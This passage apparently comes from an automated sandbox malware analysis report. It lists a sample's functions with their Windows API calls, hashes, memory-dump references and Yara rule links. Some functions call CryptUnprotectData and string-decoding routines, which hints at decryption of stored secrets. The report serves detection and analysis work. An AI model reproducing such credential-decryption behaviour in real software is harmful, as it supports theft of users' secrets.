                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocateProcess
                                  • String ID:
                                  • API String ID: 3825993179-0
                                  • Opcode ID: 55220bf06f412f5f5b69d23f8a82cf4df34f5a323157ef861e7919f3217a7987
                                  • Instruction ID: d2c0966e62432ecd76534f1e8c76f5fbba0588c9d86e7775ff99dadf0ae39aed
                                  • Opcode Fuzzy Hash: 55220bf06f412f5f5b69d23f8a82cf4df34f5a323157ef861e7919f3217a7987
                                  • Instruction Fuzzy Hash: 05011AB0600205ABDB109FA5EC89BAABBADEF95311F108159BE0987240DA719984DBA4
                                  Function 00349B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00349B3B
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00349B4A
                                  • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00349B61
                                  • LocalFree.KERNEL32 ref: 00349B70
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 7f2f31ea750cc7d9240e420bec4ec2f860c4d9a2329726a1ee942293284aa86f
                                  • Instruction ID: 55fdec0f4c5fec839df60cf578b1912fe16c062f33737b5560757cb5959a6d3a
                                  • Opcode Fuzzy Hash: 7f2f31ea750cc7d9240e420bec4ec2f860c4d9a2329726a1ee942293284aa86f
                                  • Instruction Fuzzy Hash: 90F01D70350312ABE7311F65BC49F577BA8EF14B50F210155FA49EA2D0E7B09884DAA4
                                  Function 0035CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(0036B110,00000000,00000001,0036B100,?), ref: 0035CB06
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0035CB46
                                  • lstrcpyn.KERNEL32(?,?,00000104), ref: 0035CBC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                  • String ID:
                                  • API String ID: 1940255200-0
                                  • Opcode ID: 78c931a324821e549a2b749e0d17ed8aac7a67354d81161bcfa5bc75402fba71
                                  • Instruction ID: a35a521da9992a624b4878ba92bcdbf7fe0ee12e4303109ca1fec3ba2876d6a0
                                  • Opcode Fuzzy Hash: 78c931a324821e549a2b749e0d17ed8aac7a67354d81161bcfa5bc75402fba71
                                  • Instruction Fuzzy Hash: 3D316471A40315BFD711DB94CC96FAAB7B99B88B15F104184FA04EB2D0D7B0AE44CFA0
                                  Function 00349B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00349B9F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00349BB3
                                  • LocalFree.KERNEL32(?), ref: 00349BD7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 3fd5f1e263a193a621daf4fad57ed6e5eced909bcfee4cb808f7284150372a86
                                  • Instruction ID: c17f67bea53e7f58e0a2fc525681c3d5860777c59a3412e309f31bb86970e417
                                  • Opcode Fuzzy Hash: 3fd5f1e263a193a621daf4fad57ed6e5eced909bcfee4cb808f7284150372a86
                                  • Instruction Fuzzy Hash: 40011275E41309ABD710DBA4EC45FBBB778EB44700F104555EA04AB280D774AD04CBE1
                                  Function 006E2B1E Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: y~?
                                  • API String ID: 0-2413047131
                                  • Opcode ID: 9738fe1ddf68d0aa327e5aa1f3ff28ddfa1f2c2b1923f4678d8b1e6274c69bb9
                                  • Instruction ID: 4be7ab7aed14a795bda4044251e1539eb832d479b99c32c8a90510b5f77b840e
                                  • Opcode Fuzzy Hash: 9738fe1ddf68d0aa327e5aa1f3ff28ddfa1f2c2b1923f4678d8b1e6274c69bb9
                                  • Instruction Fuzzy Hash: 766129F3A086009BF3046E29EC4577ABBD5EBC4720F1A863DEBC4D7784E53998058796
                                  Function 0059AB7A Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2o
                                  • API String ID: 0-2559669485
                                  • Opcode ID: 595f895e69ab5425baf6e9e066ca809d58eb0d909b3634ce35974e87f321c12e
                                  • Instruction ID: cd2992821a392c34a98f0f2ef0cfe4a975f3d71abd9b2d96bfcb3374a9be75ea
                                  • Opcode Fuzzy Hash: 595f895e69ab5425baf6e9e066ca809d58eb0d909b3634ce35974e87f321c12e
                                  • Instruction Fuzzy Hash: 4E6136F3A082104BE3146E3DDC8877ABBD5EF84720F1A463DDAD4C7784EA3518448782
                                  Function 0070AD83 Relevance: .5, Instructions: 477COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f5982389cd97102c86e6217c8b31e4d7067364d68b9004057c551a02af0df29
                                  • Instruction ID: 1939190bf742dc1011ebf8f8b040e9858db5987a16276ebba9eff023800519b2
                                  • Opcode Fuzzy Hash: 8f5982389cd97102c86e6217c8b31e4d7067364d68b9004057c551a02af0df29
                                  • Instruction Fuzzy Hash: BDE1F7F350C210AFE304AE2DDC4567ABBDAEFD4320F168A3DE6C493744EA3558018697
                                  Function 0068D120 Relevance: .2, Instructions: 239COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a803992eb33b395ecce09d1d583c5c34f06d4476cb0a03acd0dc832935b4be2
                                  • Instruction ID: 3e6077dc2760a55e5c82911a203f0ff0ecd647fc78561160b279fd1bc6609dfd
                                  • Opcode Fuzzy Hash: 7a803992eb33b395ecce09d1d583c5c34f06d4476cb0a03acd0dc832935b4be2
                                  • Instruction Fuzzy Hash: A67129F3E092145BE3186E29EC4576AB7D5EB90320F1B853DEAC8E7380E9795C0487D6
                                  Function 0064C697 Relevance: .2, Instructions: 189COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1991fc22e088b72066c70f03faf21dc5b5b676d167bd3c19dded7b109a15a9a
                                  • Instruction ID: 96a797818b4c17f80c76cc280341c66870800594e7dec3f0a3bf9529412d751d
                                  • Opcode Fuzzy Hash: b1991fc22e088b72066c70f03faf21dc5b5b676d167bd3c19dded7b109a15a9a
                                  • Instruction Fuzzy Hash: 71512BF360C6049FE308AE2DED9577AB7D6EBD4320F16863DE78583784ED3914058646
                                  Function 005CFC2F Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 36a95695485c68b62619cbc5bc5616c753f11a977c269e38e2f104ad55a0f47b
                                  • Instruction ID: 967ef2b4c770d320feb339fbf3b6facb95af005e836ac8e9be02dc2f2d0c4ab4
                                  • Opcode Fuzzy Hash: 36a95695485c68b62619cbc5bc5616c753f11a977c269e38e2f104ad55a0f47b
                                  • Instruction Fuzzy Hash: 56413BB3E052246BE700692DEC84767B78AD794770F1F8139EF8863388E87A6C0942D1
                                  Function 0079834E Relevance: .1, Instructions: 135COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77635076e65d4417c80afd0ac6c145f579de31e065b56a9eba8cde4f6752cb57
                                  • Instruction ID: b495ef2842b04f9a398f3557592cf7aa32f672e08a6a737e66ba2a728032401a
                                  • Opcode Fuzzy Hash: 77635076e65d4417c80afd0ac6c145f579de31e065b56a9eba8cde4f6752cb57
                                  • Instruction Fuzzy Hash: 8C41E1F650CA00DBDB50AE28FC8077EB7E5AFA5710F26892DD7C187314EA3954119793
                                  Function 003585B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 00358636
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035866D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 003586AA
